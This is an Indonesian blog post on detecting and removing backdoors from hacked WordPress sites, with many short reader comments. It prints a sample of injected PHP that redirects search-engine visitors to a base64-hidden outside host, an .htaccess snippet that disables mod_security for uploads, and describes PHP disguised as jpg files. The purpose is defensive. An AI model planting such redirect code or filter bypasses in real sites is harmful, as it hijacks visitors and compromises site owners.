Cegah Hacker Mengincar WordPress Anda!

Home » Headline, Tips dan Trik, WordPress

Cegah Hacker Mengincar WordPress Anda!

Ditulis pada 4 December 2009 telah dibaca 228 kali 40 Komentar

Anda memiliki blog bermesin WordPress? Pernah mendengar bahwa ada yang bisa meng-hack blog berbasis WordPress? Atau Anda pernah melihat secara langung situs favorit Anda –yang masih berbasis WordPress- di-hack? Anda pernah menjadi korban si Hacker?

Ok, sebelum terjadi kesalah-pahaman, Saya hanya ingin mengklarifikasi, sebenarnya istilah Hack (predikat) atau Hacker (subjek) kurang cocok; karena Hack memiliki artian luas, meskipun masyarakat awam mengganggap bahwa Hack atau Hacker selalu ke arah konotasi negatif. Bahkan, Bill Gates -sang pendiri Microsof- pun bisa disebut Hacker.

Dalam artikel ini, Hack/Hacker memiliki arti negatif dan tidak baik. Sepakat? Loh? Koq jadi membahas masalah Hack/Hacker? Baiklah, sekarang kita ke pendahuluan

Masih ingat saat banyak media memberitakan bahwa blog si A atau si B kena hack? Masih ingat tulisan “Please Update Now” di bagian Dashboard WordPress Anda jika terdapat versi baru? Anda sudah mengupgrade versi WordPress Anda? Belum? Hanya masalah waktu sampai blog Anda juga di hack

Malangnya, untuk sebagian blogger yang telah mengupgrade, mereka terkadang terlambat mengantisipasi. Sang hacker malah lebih dulu mengetahui seluk-beluk blog kita (perhatian! Ini bukan BloG kiTa yang ini ) dan (mungkin) telah meletakkan BackDoor (apa itu? Monggo dicari di om google ).

Apa yang harus Anda lakukan jika Blog WordPress Anda kena Hack?

Segera upgrade WordPress Anda ke versi yang paling baru.
Yakinkan tidak ada BackDoor atau Malicious Code di sistem Anda. Terkadang sang Hacker meletakkan script baru atau bisa juga merubah file standar WordPress. Cek juga file theme yang Anda gunakan.
Ganti Password lama Anda setelah upgrade selesai. Yakinkan bahwa Hacker tidak membuat admin/user lain di WordPress Anda.
Edit file wp-config.php dan ubah atau buatlah sebuah SECRET_KEY. SECRET_KEY biasanya memiliki format:

define(‘SECRET_KEY’, ‘07081987’)

silakan dirubah angka-angka di atas dengan kreasi Anda sendiri

Kode Tersembunyi oleh Hacker

Biasanya, para Hacker menggunakan beberapa cara untuk merusak blog WordPress Anda, diantaranya dengan:

Menyembunyikan kode jahat di script php Anda. Jika direktori blog dan file Anda berstatus Writeable oleh WebServer, sang hacker bisa leluasa menanam kode-kode yang menguntungkan mereka. Contoh yang paling sering menjadi sasaran empuk adalah wp-blog-header.php. File theme yang digunakan juga beresiko. Saat Anda meng-upgrade WordPress Anda, file theme Anda tidak ikut berubah, jadi silakan cek sekali lagi. Apalagi jika Anda menemukan file ter-decode, seperti:

< ?php $seref=array(”google”,”msn”,”live”,”altavista”,”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1″; break; }if($ser==”1″ && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>< ?php DST (kalau ditulis lengkap, ntar disalah gunakan )

Untuk melihat berbagai macam bentuk script yang mungkin berbahaya, bisa melihat di sini.

Merubah file .htaccess. Cek file .htaccess yang berada di bagian root direktori blog Anda. Jika Anda tidak pernah mengubahnya, maka seharusnya Anda akan melihat kode-kode berikut:

# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPress

Mungkin juga Anda akan mendapati tambahan kode (biasanya akibat program uploader yang Anda gunakan), seperti:

<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule>

Memasukkan kode PHP namun disamarkan dengan file berformat jpeg ke direktori upload Anda dan menambahkan beberapa file yang bertugas untuk mengaktifkan beberapa plugin yang mereka kehendaki. Hal ini sulit dideteksi ataupun ditemukan. Namun, bukan hal yang mustahil. Silakan coba cara ini:

- Buka PHPMyAdmin dan masuklah ke options table. Cari data active_plugins

- Edit data tersebut. Anda akan menemukan tulisan-tulisan “aneh” dan panjaaaaaaaaaaaaaaaang sekali. Carilah teks seperti “../uploads/2009/08/07/xzvrtgfhjks.jpg” (perhatikan nama file *.jpg nya. Ingat-ingat apa Anda pernah mengupload file jpg dengan nama aneh begitu? ). Hapus teks tersebut dan pastikan Anda juga membasmi serialized array information. Hapus juga active_plugins record dan aktifkan semua plugin Anda sekali lagi

- Periksa direktori upload untuk file jpg tersebut. Hapuslah.

- Jika binggung, silakan lihat video ini. Hanya saja, dalam video tersebut ada proses penghapusan rss_* database record. Saya rasa ini tidak terlalu penting (bagi Saya yang awam). Atau ada yang ingin menjelaskan mengapa rss_* juga harus dihapus?

Ubah Password WordPress Anda

Setiap Anda mengupgrade dan yakin bahwa proses installasi berjalan lancar dan tidak terdapat jejak penyusup, pastikan Anda:

1. Merubah SELURUH password user yang ada dalam sistem WordPress Anda

2. Yakinkan bahwa sang Hacker tidak memiliki akun yang dapat digunakan untuk login suatu saat nanti.

Install Plugin Pendeteksi Hack

Sebagai langkah pengamanan, ada baiknya Anda menginstall WordPress Exploit Scanner yang akan membantu Anda dalam menemukan file/script yang berbahaya yang Ada dalam blog WordPress Anda.

Semoga tulisan sederhana ini akan mengurangi angka pengrusakan situs, khususnya blog bermesin WordPress. Jika ada kesalahan dalam pemaparan, tolong bantu Saya memperbaikinya

Blogger yang Baik adalah Blogger yang Merawat dan Menjaga Blog-nya.

*sekedar informasi, WordPress yang paling sering kena hack adalah versi 2.6 ke bawah. So, segera upgrade ya! 2.8.6 lho yang sekarang

Artikel Lain yang berhubungan:

Yes or No : Ganti Theme blogkita.info

Perlengkapan Perang Ku :D

SEO untuk WordPress

Belajar Membuat Forum Yuk

Make a WordPress Theme? Tulisan di atas bermanfaat untuk Anda? Silakan disebarkan agar orang lain juga memperoleh manfaat yang sama dengan Anda..

40 Comments »

iyoong said:

PertaMaaaxxx…..

nyimak dulu..,mantep dah…..kaga paham (belum) bhasa PHP…:-B

jadi kalo dah diupgrade ke versi terbaru, apakah yakin aman ??
iyoong´s last blog ..Give Them The Spirit alive

# 4 December 2009 at 12:41 am

reza said:

Masih belum terlalu paham nih bahasa pemrograman PHP tapi bagus juga nih buat nambah ilmu… 8->
reza´s last blog ..Visi dan Misi

# 4 December 2009 at 8:22 am

Zaiful Anwar said:

Belum gerti tapi gak apalah nambah ilmu juga n makasih info.

# 4 December 2009 at 5:52 pm

aidicard said:

Panjang amat… ctrl+d aja dulu.. trims info nya bro..

# 5 December 2009 at 9:12 am

Rizal said:

info nya membantu … save as j dlu biar diprint …
Rizal´s last blog ..Indonesia

# 5 December 2009 at 10:11 am

hotfreez said:

wah infonya berguna banget…THANKS!!!!

# 5 December 2009 at 10:03 pm

Achmad Fauzi said:

Wuah mantab mas. trims infonya.
Salam

# 6 December 2009 at 11:37 pm

manusiahero said:

bah iyaam.. kada ngerti am WP hohoho 8->
manusiahero´s last blog ..Renungan Cinta

# 8 December 2009 at 1:07 pm

Irawan said:

Wah thank’s infonya…
aku punya tambahan 1 point, selalu backup database website.
kadang kalo sudah kecolongan, dan data2 kita dirusak satu langkah kecil ini yang bisa menyelamatkan artikel2 kita.
Irawan´s last blog ..Secangkir Kopi Pahit

# 12 December 2009 at 7:48 pm

iklan baris gratis said:

ngeri juga kalo wordpress bisa di hack.. secara blog ane semua pake wordpress.. terima kasih infonya manteb.. langsung praktek..

ups sekalian numpang promosi
iklan baris gratis

# 15 December 2009 at 1:21 am

Bisnis Online said:

Mau tanya nih sob, kalau upgrade WP, settingan theme dan pluginnya masih tetap seperti semula ga?
Bisnis Online´s last blog ..Dengan Sepuluh Dollar Dapat Seratus Domain Gratis

# 15 December 2009 at 11:43 am

Car Review said:

nice info gan…
Car Review´s last blog ..2010 Ford Mustang GT

# 18 December 2009 at 2:58 am

nurie said:

blognya keren…..

# 18 December 2009 at 3:00 am

Lowongan BUMN said:

waduh untungnya, gak pake word press nih, pake blogger terus

# 21 December 2009 at 4:08 pm

Lowongan kerja bank said:

mantep nih artikelnya, mesti bookmark dulu kayaknya, ntar malam baru praktekin
Lowongan kerja bank´s last blog ..Links for 2009-12-19 [Digg]

# 21 December 2009 at 4:12 pm

intermezo said:

artikel yang sangat bermanfaat bagi para pemakai wp, thanks kawan, blon bisa dihafal nih… jd saya bookmark dulu…
intermezo´s last blog ..Kontes SEO Astaga.com

# 22 December 2009 at 12:30 pm

Kompetisi Website Kompas MuDA–KFC said:

hacker-hacker tak bertanggung jawab
Kompetisi Website Kompas MuDA–KFC´s last blog ..Rujak Kuah Pindang

# 24 December 2009 at 6:39 am

Ngobrol Seputar Bisnis Online said:

wew. . .keren kang tipsnya. mesti bnyk belajar disini nih kyknya
Ngobrol Seputar Bisnis Online´s last blog ..Daftar Pemenang Kontes Mengembalikan Jati Diri Bangsa

# 24 December 2009 at 6:07 pm

liudin said:

belum pernah dengar wordpress bisa di hack? klau pun bisa itu mungkin karena keteledoran kita saja dalam menyimpan password dll
liudin´s last blog ..4 Alasan Utama Untuk Mulai Menulis

Kalau Saya pernah melihat secara langsung (lupa alamat blognya). Sepertinya bukan masalah menyimpan password, tetapi akibat inject sql

# 27 December 2009 at 5:18 am

topanz said:

tapi kalo blog seperti blog saya ngga bakal dah ada hacker tertarik buat ngejahilin..biasanya blog2 gede tuh..hehehehe..salam kenal mas
topanz´s last blog ..Selamat Jalan Gus Dur

# 31 December 2009 at 5:29 pm

Zian X-Fly said:

Makasih banyak infonya. Tapi blog saya rusak justru karena saya sendiri salah mengubah tempalte. Gimana ya memperbaikinya? Login pun saya tidak bisa di zianxfly.web.id
Zian X-Fly´s last blog ..Dunia Baru

# 31 December 2009 at 10:41 pm

yanti tukang kerupuk said:

kau pernah kena hack tuh….untung gak parah banget….
yanti tukang kerupuk´s last blog ..Energi kita adalah kerja keras

# 2 January 2010 at 8:20 pm

yanti tukang kerupuk said:

maksudnya blog aku pernah kena hack mas….typo! Maaf,salam.

# 2 January 2010 at 8:21 pm

fiki said:

nice post
fiki´s last blog ..Grosir Jaket Batik

# 8 January 2010 at 8:40 am

CDMA Blackberry said:

waduh mesti ekstra hati hati nih, biar gak kena hack. salah satu cara yg cukup bagus adalah sering ganti password kali yah?
CDMA Blackberry´s last blog ..Multi Touch In Google Nexus One

# 10 January 2010 at 6:35 pm

tips computer said:

wah-wah halaman ini mah harus di bookmarked dulu sob, makasih inphonya yah
tips computer´s last blog ..Partisi harddisk

# 18 January 2010 at 5:06 pm

http://absensisidikjari.com/ said:

Luarbiasa bos tipsnya! Matur Tank’s

Regard’s

# 19 January 2010 at 10:46 am

Laston said:

makasih infonya bro.. apa sama dengan Blogger juga ya?
Laston´s last blog ..“Kerikil” di dalam panitia Angket Century

Kemungkinan berbeda, karena kita tidak bisa masuk ke root milik blogger

# 19 January 2010 at 1:46 pm

annosmile said:

makasih banget infonya
memang walaupun hanya sebuah blog tetap berharga bagi saya..

# 25 January 2010 at 3:33 pm

madhe said:

salam kenal mas.

ane orang ngalam..

kunjugan balik yah..
madhe´s last blog ..Liburan yang mengenaskan..

# 26 January 2010 at 3:28 pm

Human Biology said:

ah pusing mas…
gak begitu paham sih masalah begituan..
Human Biology´s last blog ..Guide to Have Healthy and Beautiful Body

# 27 January 2010 at 4:56 pm

DianRibut said:

thankss dah sharing. .

haduh,aku belum upgrade lagi mass. .

harus segera niehh
DianRibut´s last blog ..Kompetisi Website Kompas MuDA – KFC

# 4 February 2010 at 1:40 pm

Terpal said:

wah….ane pake wordpress gan….

bahaya nih….

# 8 February 2010 at 3:42 pm

apriannor said:

agggrrrrhhhhh!!!!!!

I hope Force be with my blog

# 9 February 2010 at 11:47 pm

irmanf said:

fiuhh, ternyata sang hacker juga mengincar wordpress rupanya…
wah, harus waspada nih.
irmanf´s last blog ..Tips Jitu Merawat Cartridge Printer Agar Awet

# 12 February 2010 at 12:55 am

agus darmika said:

wwwiihhh…jadi ngeri jg nih,

# 16 February 2010 at 1:51 pm

sms cinta lucu said:

wah,makasih infonya…
sms cinta lucu´s last blog ..SMS Romantis - Kesungguhan Cinta

# 25 February 2010 at 12:13 am

Alam said:

wah makasih banget nih informasinya….
sangat membantu saya…
thanks..
Alam´s last blog ..Spesifikasi Kamera Digital Pentax K-7

# 6 March 2010 at 12:31 am

Lirik Lagu Terbaru said:

informasi yang berguna

terima kasih banyak
Lirik Lagu Terbaru´s last blog ..Audy – Selalu Terdepan

# 8 March 2010 at 6:40 pm

Nowgoogle.com Adalah Multiple Search Engine Popular said:

sekarang banyak sekali blog2 yang kena hack…salah satunya temen saya

aku coba tutorialnya…mudah2an bermanfaat ini
Nowgoogle.com Adalah Multiple Search Engine Popular´s last blog ..By: Khairuddin syach

# 13 March 2010 at 10:11 am

Apa tanggapan Anda?

Berikan tanggapan Anda di bawah ini, atau trackback dari blog Anda. Anda juga bisa berlangganan komentar di sini via RSS. "Be nice. Keep it clean. Stay on topic. No spam."

Name (required)

Mail (will not be published) (required)

Website (optional)

$\m/$

Anda dapat menggunakan tag berikut:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Foto Gravatar Anda dapat muncul di Komentar pada ahyari [dot] com. Jika belum punya Gravatar, silakan daftar di di sini.